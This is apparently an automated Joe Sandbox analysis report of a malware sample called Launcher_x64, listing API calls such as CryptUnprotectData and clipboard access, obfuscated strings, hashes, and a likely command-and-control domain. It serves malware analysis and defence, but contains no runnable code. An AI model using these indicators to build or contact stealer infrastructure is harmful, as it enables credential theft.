                                                                                                                                                                                                                                                                                        • Opcode ID: 25030e0f54187dd7d97a5094e6b67fba24dfc7d6c651b842d8accc0a2a09a670
                                                                                                                                                                                                                                                                                        • Instruction ID: a422c0ca82652f737e4f1e142246e6692507047bea1aeb5a718bc394c3bfefce
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 25030e0f54187dd7d97a5094e6b67fba24dfc7d6c651b842d8accc0a2a09a670
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7E4155B1A053108BDB18CF22C89176BB3E2FF99318F19952DE889473D0E7399D04CB86
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetPhysicallyInstalledSystemMemory.KERNEL32(?), ref: 0042DB8E
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: InstalledMemoryPhysicallySystem
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3960555810-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 72ad962deb764843d33cd4e862aa4473b958394af15c913e83fe9b27cef8db69
                                                                                                                                                                                                                                                                                        • Instruction ID: 1e38fdd2a070c5190578cea8d7e00dd51e2a253d61de10ec1e8fea606ecc6a7c
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 72ad962deb764843d33cd4e862aa4473b958394af15c913e83fe9b27cef8db69
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8212E670604B518FD725CF29D490762FBE2AF97310F28829ED4DA8B792D739E806CB54
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0041848D
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CryptDataUnprotect
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 834300711-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 94f1619d0213c66efed45e7fc48bac5a3fb9675e641e5121d8995465e2b33201
                                                                                                                                                                                                                                                                                        • Instruction ID: b5f110dc900f150b17a9ab2730c3f268e57193e66b42661d4aec5e60a62e6f1c
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 94f1619d0213c66efed45e7fc48bac5a3fb9675e641e5121d8995465e2b33201
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F251C9716082429FC718CF28C4917AFB7D2ABD5314F588A2EE4A9C7381E739D845C786
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • LdrInitializeThunk.NTDLL(0043E4EB,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043C3BE
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                                                                        • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                        • String ID: <;:9
                                                                                                                                                                                                                                                                                        • API String ID: 2994545307-3375088645
                                                                                                                                                                                                                                                                                        • Opcode ID: ea2a51e6249a908ff67df608b898d45a155b98b875273cdc1e1072d0039dcdbf
                                                                                                                                                                                                                                                                                        • Instruction ID: 5f15f40da82492e0b1ba2af83039ee2b9b7e6c15b25aba3d17fa9b47de68de05
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ea2a51e6249a908ff67df608b898d45a155b98b875273cdc1e1072d0039dcdbf
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 86412536B043209BD7249A66CC81B3BB2E6B7CD710F19993DE989E73D0D228EC009785
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID: LppD
                                                                                                                                                                                                                                                                                        • API String ID: 0-4210666678
                                                                                                                                                                                                                                                                                        • Opcode ID: eefbf11c5dec5ab344813fc4d060d0068d94ab0567afc537f306fcfbd44f21c7
                                                                                                                                                                                                                                                                                        • Instruction ID: 855bee060028c4c386b9165997aa1c1878383dced02fbfdc783bb1665570fd4c
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: eefbf11c5dec5ab344813fc4d060d0068d94ab0567afc537f306fcfbd44f21c7
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 533149606047918BD7258F29D490333BBE1BF17304F18569DD0D68B786C73CE406CB99
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        control_flow_graph 709 40c708-40c74b CoInitializeSecurity * 2
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040C71A
                                                                                                                                                                                                                                                                                        • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040C732
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: InitializeSecurity
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 640775948-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: FreeLibrary
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3664257935-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: BlanketProxy
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3890896728-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,00000000,0040B23E,00000000,?,?), ref: 0043C362
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: BlanketProxy
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3890896728-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: BlanketProxy
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3890896728-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C6D3
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Initialize
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2538663250-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • RtlFreeHeap.NTDLL(?,00000000,?,0043C37B,?,0040B23E,00000000,?,?), ref: 0043A8BE
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: FreeHeap
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3298025750-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(?,00000000,?,?,00000000), ref: 0043A889
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID: jl$"F+X$#^9P$%J(L$'B:D$(R4T$2N1@$:Z$\$kV!h$mn$ryB${B
                                                                                                                                                                                                                                                                                        • API String ID: 0-1538198085
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                                                                                                                                                                                                                        • String ID: 8$?$G$H$I$K$V
                                                                                                                                                                                                                                                                                        • API String ID: 2832541153-3986132860
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID: jl$"F+X$#^9P$%J(L$'B:D$(R4T$2N1@$:Z$\$KlGn$TqB$Z^XN$bFaj$kV!h$mn
                                                                                                                                                                                                                                                                                        • API String ID: 0-1793681726
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID: 9'gs$;<$CXdZ$G$@&$a\]^$gb(+$n`of$zlbz
                                                                                                                                                                                                                                                                                        • API String ID: 0-2826994576
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID: JBI$5G4F$CGHv$HOyy$RZ$So]Z$oo]_
                                                                                                                                                                                                                                                                                        • API String ID: 0-1391714108
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID: 68C6103D0F18277B312F742701D40858$<$KX]^$i$kXSD$}~$~@q}
                                                                                                                                                                                                                                                                                        • API String ID: 0-2505310567
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID: C*)?$C88,$E[Gx$]$]$h{
                                                                                                                                                                                                                                                                                        • API String ID: 0-2596919934
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID: 2{[.$<=$R{[.$Y8Y:$]xyz$vw
                                                                                                                                                                                                                                                                                        • API String ID: 0-654056292
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID: 53$:$VM_U$mqoh$sqmp$tpfr
                                                                                                                                                                                                                                                                                        • API String ID: 0-2138070392
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(36557EAD), ref: 0042E8B3
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: FreeLibrary
                                                                                                                                                                                                                                                                                        • String ID: >$ZWUZ
                                                                                                                                                                                                                                                                                        • API String ID: 3664257935-985827506
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 0043C390: LdrInitializeThunk.NTDLL(0043E4EB,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043C3BE
                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00419F8A
                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 0041A02B
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: FreeLibrary$InitializeThunk
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 764372645-0
Strings
Memory Dump Source
• Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
Similarity
• API ID:
• String ID: IO{H$p$w&$yX=Z
• API String ID: 0-258344299
• String ID: DE$lev-tolstoi.com$?C
• API String ID: 0-153105410
• String ID: 7$gfff$tu
• API String ID: 0-496940666
• String ID: \g$6
• API String ID: 0-3854233087
• String ID: BLCJ$N@FN
• API String ID: 0-3139961213
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID: .jB$VCQA
                                                                                                                                                                                                                                                                                        • API String ID: 0-3993559281
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID: 0oA$I'j)
                                                                                                                                                                                                                                                                                        • API String ID: 0-1810545798
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID: lEZ[
                                                                                                                                                                                                                                                                                        • API String ID: 0-2584274222
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                        • String ID: <;:9
                                                                                                                                                                                                                                                                                        • API String ID: 2994545307-3375088645
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID: lev-tolstoi.com
                                                                                                                                                                                                                                                                                        • API String ID: 0-483096278
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID: ;4
                                                                                                                                                                                                                                                                                        • API String ID: 0-2844496594
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID: ;4
                                                                                                                                                                                                                                                                                        • API String ID: 0-2844496594
Memory Dump Source
• Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 9975d5096d2df598f8f1b18b65e16e51dc04a4eb8820b26996945d24d50b5e07
                                                                                                                                                                                                                                                                                        • Instruction ID: 4646a0a207e90d32a5f07b6c062fc331b9b4eda89b06272facc8898fe6ae0c9d
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9975d5096d2df598f8f1b18b65e16e51dc04a4eb8820b26996945d24d50b5e07
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CB023476A083008FD704DF25D8527ABB7F1EF85319F18842DE88587391E779DA46CB8A
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 7bda4b375fcd006c169eac15fcd02c62b224c6f04cfe56def1b0a70d90047895
